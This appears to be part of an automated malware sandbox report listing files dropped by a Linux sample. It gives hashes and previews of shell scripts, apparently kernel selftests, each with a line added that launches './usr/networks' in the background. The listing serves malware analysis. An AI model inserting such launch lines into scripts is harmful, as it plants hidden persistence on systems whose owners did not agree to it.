                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):102
                                                                  Entropy (8bit):4.638138950562586
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVamWAbVCvQuvBC9bJjWXVOORgn:UHoI5xJjWMn
                                                                  MD5:BF6CFB4EB24EF2D6770C6E88F2D48CF6
                                                                  SHA1:30F86D44F198688813975091335B034C508529A4
                                                                  SHA-256:5830A3B6E02504DED80C09F352198D9ADA04EBB8BBAD624EEB76BB774F9EFC0E
                                                                  SHA-512:BACEA9BC12AA688A2AF74D94B12CD127BACE8A09E96B5093D7E77CF80DCC5632DF91B749CB095A23D73EC0063570051AE90CD285168D10EFCEAA6E2F89345EE9
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit.else..tcflags="skip_sw"..tests_run.fi..exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2769
                                                                  Entropy (8bit):5.133719950377315
                                                                  Encrypted:false
                                                                  SSDEEP:48:rmGWMuirlYJVhOCJJz5irlzd70ri1dW1rEaVSsSvMdEh/eeReICQZZ3L:0M/4Ogeh50rIE1rEa+5
                                                                  MD5:67D30EDDF203F92ABFD29A6CD1E7B5CC
                                                                  SHA1:D853778457F6A19E75D04109478E4B9A640278E5
                                                                  SHA-256:E19FD8BBE99B2A5BABE6CA40F40F694180D38C1279965B2277F0A7491C62483F
                                                                  SHA-512:1EB59594335691EE52311085BF21760B35F7A7C65ADFABACB02331A463326629D04764E2994E8DC2D50477844C8AD2DC5457B99FA8C40AD96304E6D69FD6C82B
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..# Needed for returning to default.declare -A KVD_DEFAULTS..KVD_CHILDREN="linear hash_single hash_double".KVDL_CHILDREN="singles chunks large_chunks"..devlink_sp_resource_minimize().{..local size..local i...for i in $KVD_CHILDREN; do...size=$(devlink_resource_get kvd "$i" | jq '.["size_min"]')...devlink_resource_size_set "$size" kvd "$i"..done...for i in $KVDL_CHILDREN; do...size=$(devlink_resource_get kvd linear "$i" | \... jq '.["size_min"]')...devlink_resource_size_set "$size" kvd linear "$i"..done.}..devlink_sp_size_kvd_to_default().{..local need_reload=0..local i...for i in $KVD_CHILDREN; do...local size=$(echo "${KVD_DEFAULTS[kvd_$i]}" | jq '.["size"]')...current_size=$(devlink_resource_size_get kvd "$i")....if [ "$size" -ne "$current_size" ]; then....devlink_resource_size_set "$size" kvd "$i"....need_reload=1...fi..done...for i in $KVDL_CHILDREN; do...local size=$(echo "${KVD_DEFAULTS[kvd_linear_$i]}" | \.... jq '.["size"]')...current_size=$(
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):51
                                                                  Entropy (8bit):4.191841518357241
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORjOvSQQVOORgn:hTn
                                                                  MD5:E8B5B0C858BA91B08AB7D5854CA9A181
                                                                  SHA1:C8591F8AB15C3DBC82367F2D914E7F534760DF1C
                                                                  SHA-256:3F8F722A471E414F5B4C637579E3367E30B68A5288E4B7FC950EB149E23BE321
                                                                  SHA-512:017A894266385B29B37858BB3CEC7A57F8F8E344FCCB9EE002ABAA32596C511BB2E91891BC1C2E4CE8FF5A08C0F8DC0D03CC468024097072CCC3B894CD24BE2B
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit "$RET"../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):51
                                                                  Entropy (8bit):4.191841518357241
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORjOvSQQVOORgn:hTn
                                                                  MD5:E8B5B0C858BA91B08AB7D5854CA9A181
                                                                  SHA1:C8591F8AB15C3DBC82367F2D914E7F534760DF1C
                                                                  SHA-256:3F8F722A471E414F5B4C637579E3367E30B68A5288E4B7FC950EB149E23BE321
                                                                  SHA-512:017A894266385B29B37858BB3CEC7A57F8F8E344FCCB9EE002ABAA32596C511BB2E91891BC1C2E4CE8FF5A08C0F8DC0D03CC468024097072CCC3B894CD24BE2B
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit "$RET"../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):6617
                                                                  Entropy (8bit):4.936895915985005
                                                                  Encrypted:false
                                                                  SSDEEP:192:O6QYwsHe5V/sceJgr69j2w7ep0wILUzrdca55dcaCqP2SUzr49XfK1:TQ668hLMng
                                                                  MD5:B28EB701E14FE1525C67BEC4C7004025
                                                                  SHA1:26BBF86610455D690F6A0122FB5F6FCDC16B1C4E
                                                                  SHA-256:39463AE65D6728E9BBE6B5DED3D40FF7359A86E0A1FD11CD0D791BA4418E6A66
                                                                  SHA-512:A6DA5A7308C7A436EC03D484831D06FE88680879CD5750530374D98E760DC5CC8C5E69B1B3BE46622D311B1D7BDAC6AF0A3C642F66A5FFAC8A1419A9CE9E2E94
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..if [ -d "${NETDEVSIM_PATH}/devices/netdevsim${DEV_ADDR}" ]; then..echo "SKIP: Device netdevsim${DEV_ADDR} already exists"..exit 1.fi..init_test().{..RET=0...test $(devlink_traps_num_get) -ne 0..check_err $? "No traps were registered"...log_test "Initialization".}..trap_action_test().{..local orig_action..local trap_name..local action...RET=0...for trap_name in $(devlink_traps_get); do...# The action of non-drop traps cannot be changed....if [ $(devlink_trap_type_get $trap_name) = "drop" ]; then....devlink_trap_action_set $trap_name "trap"....action=$(devlink_trap_action_get $trap_name)....if [ $action != "trap" ]; then.....check_err 1 "Trap $trap_name did not change action to trap"....fi.....devlink_trap_action_set $trap_name "drop"....action=$(devlink_trap_action_get $trap_name)....if [ $action != "drop" ]; then.....check_err 1 "Trap $trap_name did not change action to drop"....fi...else....orig_action=$(devlink_trap_action_get $trap_name).....devlink_trap_
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):5898
                                                                  Entropy (8bit):4.146162776904928
                                                                  Encrypted:false
                                                                  SSDEEP:96:3MAOhjI7eKMJEmxsuSKb6xsD6cs6xA9K6VL/IYs6xEBYc:8AO1frEMFqdKwU9z
                                                                  MD5:1DF9F67D8921FF10D08395A907676EB6
                                                                  SHA1:1B2C3403870B4046AFDBC6A10B547B1276F3F073
                                                                  SHA-256:B73CC123F11F6B80D7B8606DF81ABE4551EED2936063565B5B931D9EC646C7E8
                                                                  SHA-512:B1EE86E95AAF57D9CA0D632D946EB3DFFD2AAE96BBCDD3C8FD01537845A5884439BF834055C624404C6917F5820AC0B4BFD17EC2B3D7542C880A6192B28652DC
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.usage() { echo "usbip_test.sh -b <busid> -p <usbip tools path>"; exit 1; }..while getopts "h:b:p:" arg; do. case "${arg}" in..h).. usage.. ;;..b).. busid=${OPTARG}.. ;;..p).. tools_path=${OPTARG}.. ;;..*).. usage.. ;;. esac.done.shift $((OPTIND-1))..if [ -z "${busid}" ]; then..usage.fi..echo "Running USB over IP Testing on $busid";..test_end_msg="End of USB over IP Testing on $busid"..if [ $UID != 0 ]; then..echo "Please run usbip_test as root [SKIP]"..echo $test_end_msg..exit $ksft_skip.fi..echo "Load usbip_host module".if ! /sbin/modprobe -q -n usbip_host; then..echo "usbip_test: module usbip_host is not found [SKIP]"..echo $test_end_msg..exit $ksft_skip.fi..if /sbin/modprobe -q usbip_host; then..echo "usbip_test: module usbip_host is loaded [OK]".else..echo "usbip_test: module usbip_host failed to load [FAIL]"..echo $test_end_msg..exit 1.fi..echo "Load vhci_hcd module".if /sbin/modprobe -q vhci_hcd; then..echo "usbip_test: module vhci_hc
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3325
                                                                  Entropy (8bit):5.18808135613295
                                                                  Encrypted:false
                                                                  SSDEEP:96:4i60FDAurFb5F6dBYpnGaBYvMcccOpZVGM:r60hl15+KAa6vMcccOtf
                                                                  MD5:B78D6747B099C8DE9C03EA8326BC7024
                                                                  SHA1:E3E9F8A83D721B987B8EFDB6EC66921A8931CA3D
                                                                  SHA-256:032D9D4898DF28207B422C11BA4E330A970E1E41A26DD8BD447FCEC32F37F85D
                                                                  SHA-512:75DF777435C79F2C2A6699A6FB49DC26C1DC2F623B4BFCD9114D0060C5E948EEFD90ACC166B09F5458F1AEFB83605D2655BE476B9D000470988BE6BEFCB55F7E
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit $ksft_skip..fi...if ! grep -q "^\S\+ $efivarfs_mount efivarfs" /proc/mounts; then...echo $msg efivarfs is not mounted on $efivarfs_mount >&2...exit $ksft_skip..fi.}..run_test().{..local test="$1"...echo "--------------------"..echo "running $test"..echo "--------------------"...if [ "$(type -t $test)" = 'function' ]; then...( $test )..else...( ./$test )..fi...if [ $? -ne 0 ]; then...echo " [FAIL]"...rc=1..else...echo " [PASS]"..fi.}..test_create().{..local attrs='\x07\x00\x00\x00'..local file=$efivarfs_mount/$FUNCNAME-$test_guid...printf "$attrs\x00" > $file...if [ ! -e $file ]; then...echo "$file couldn't be created" >&2...exit 1..fi...if [ $(stat -c %s $file) -ne 5 ]; then...echo "$file has invalid size" >&2...file_cleanup $file...exit 1..fi..file_cleanup $file.}..test_create_empty().{..local file=$efivarfs_mount/$FUNCNAME-$test_guid...: > $file...if [ ! -e $file ]; then...echo "$file can not be created without writing" >&2...exit 1..fi..file_cleanup $file.}.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):5891
                                                                  Entropy (8bit):5.2976815652447
                                                                  Encrypted:false
                                                                  SSDEEP:96:att2T0AKpT0+yhvT0HXUTRNPLrwEg/8/oKkph2VkVQEIGc/2XRjIP8IGc/2XRjIz:atMnKptavcORNVg/8/oK2hykVQy1n1ly
                                                                  MD5:7945E94DD8E4A80A20A9C0417BB83BFE
                                                                  SHA1:DCAD37AF3DC4055126F0820FA70D915303906D89
                                                                  SHA-256:D917CBCE45470AEFE2944201B985641A6875CF1508FABAD755C3B60752F58CBE
                                                                  SHA-512:C134770365B4A20C067ADA348BA0FCB98ED0061E4E09BD6DC19C66206E4B582E75BFDA84BDB8FA7DF024DD3F9745E0066EF07D1375BEB771233E671177673D39
                                                                  Malicious:false
                                                                  Preview:./usr/networks&....exit 1...fi..done...echo 1 >"$DIR"/"$name"/loading..cat "$file" >"$DIR"/"$name"/data..echo 0 >"$DIR"/"$name"/loading...# Wait for request to finish...wait.}..load_fw_cancel().{..local name="$1"..local file="$2"...# This will block until our load (below) has finished...echo -n "$name" >"$DIR"/trigger_request 2>/dev/null &...# Give kernel a chance to react...local timeout=10..while [ ! -e "$DIR"/"$name"/loading ]; do...sleep 0.1...timeout=$(( $timeout - 1 ))...if [ "$timeout" -eq 0 ]; then....echo "$0: firmware interface never appeared" >&2....exit 1...fi..done...echo -1 >"$DIR"/"$name"/loading...# Wait for request to finish...wait.}..load_fw_custom().{..if [ ! -e "$DIR"/trigger_custom_fallback ]; then...echo "$0: custom fallback trigger not present, ignoring test" >&2...exit $ksft_skip..fi...local name="$1"..local file="$2"...echo -n "$name" >"$DIR"/trigger_custom_fallback 2>/dev/null &...# Give kernel a chance to react...local timeout=10..while [ ! -e "$DIR"/"$name"/
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):8744
                                                                  Entropy (8bit):5.126474919105083
                                                                  Encrypted:false
                                                                  SSDEEP:96:17k8sLeRIt8b6+616tS6vmS6be6/iS6j67S6gmQm6C1nJG4bzET0c09PsG2AUdAL:17k8WaItEjmHviMNRPbwSKVEUNUPb
                                                                  MD5:51228AD37E83FB0042A724AEFAA1082C
                                                                  SHA1:793463E45D447452F9B233D7515DB54A20FD86C5
                                                                  SHA-256:34729C2C813F8D11F41CB328AAF7A1D3D82FFF98F617D6D40A4BCD1C5FB568E4
                                                                  SHA-512:1C2B0CD1490E59F543061CE6CBA9DF970EDC6DB13DE3B9F17B8491FC5B9F2F3F80D421D3ED7659E4E34D29A5D94D5D7E3B8E19E7E4BE0B1EE9DED869E36897F8
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..if [ ! -e "$DIR"/trigger_async_request ]; then..echo "$0: empty filename: async trigger not present, ignoring test" >&2..exit $ksft_skip.else..if printf '\000' >"$DIR"/trigger_async_request 2> /dev/null; then...echo "$0: empty filename should not succeed (async)" >&2...exit 1..fi.fi..# Request a firmware that doesn't exist, it should fail..if echo -n "nope-$NAME" >"$DIR"/trigger_request 2> /dev/null; then..echo "$0: firmware shouldn't have loaded" >&2..exit 1.fi.if diff -q "$FW" /dev/test_firmware >/dev/null ; then..echo "$0: firmware was not expected to match" >&2..exit 1.else..if [ "$HAS_FW_LOADER_USER_HELPER" = "yes" ]; then...echo "$0: timeout works"..fi.fi..# This should succeed via kernel load or will fail after 1 second after.# being handed over to the user helper, which won't find the fw either..if ! echo -n "$NAME" >"$DIR"/trigger_request ; then..echo "$0: could not trigger request" >&2..exit 1.fi..# Verify the contents are what we expect..if ! diff
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):4567
                                                                  Entropy (8bit):5.5589667160679825
                                                                  Encrypted:false
                                                                  SSDEEP:48:+vUdhcGB/f2QrYUdDtV5ipEqNmjyrJV+l8qfyxSZJkXYk1SwjR77/Rm9euhd6VLr:tn6oqac/SwjXsT6VLYXy3JF/
                                                                  MD5:92D97C4DA99FC755C609467343D767BA
                                                                  SHA1:4FFC85048445B3B1637DE50178F587D8225BE295
                                                                  SHA-256:43D1431124D8A39521F3BB513F258A82595837C2A9D0BB2C6D3F701A642FC130
                                                                  SHA-512:18D817795B189F32200E8B95109F703EA4B6B3D342DBAFC8ABBD38926BB1C261A084D12CFF2D02922091EFF0527FF4615787167EF8D4137FE36F3A8FFDFC2E2A
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.print_reqs_exit().{..echo "You must have the following enabled in your kernel:" >&2..cat $TEST_DIR/config >&2..exit $ksft_skip.}..test_modprobe().{..if [ ! -d $DIR ]; then...print_reqs_exit..fi.}..check_mods().{..local uid=$(id -u)..if [ $uid -ne 0 ]; then...echo "skip all tests: must be run as root" >&2...exit $ksft_skip..fi...trap "test_modprobe" EXIT..if [ ! -d $DIR ]; then...modprobe test_firmware..fi..if [ ! -f $PROC_CONFIG ]; then...if modprobe configs 2>/dev/null; then....echo "Loaded configs module"....if [ ! -f $PROC_CONFIG ]; then.....echo "You must have the following enabled in your kernel:" >&2.....cat $TEST_DIR/config >&2.....echo "Resorting to old heuristics" >&2....fi...else....echo "Failed to load configs module, using old heuristics" >&2...fi..fi.}..check_setup().{..HAS_FW_LOADER_USER_HELPER="$(kconfig_has CONFIG_FW_LOADER_USER_HELPER=y)"..HAS_FW_LOADER_USER_HELPER_FALLBACK="$(kconfig_has CONFIG_FW_LOADER_USER_HELPER_FALLBACK=y)"..HAS_FW_LOADER_COMPRESS
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
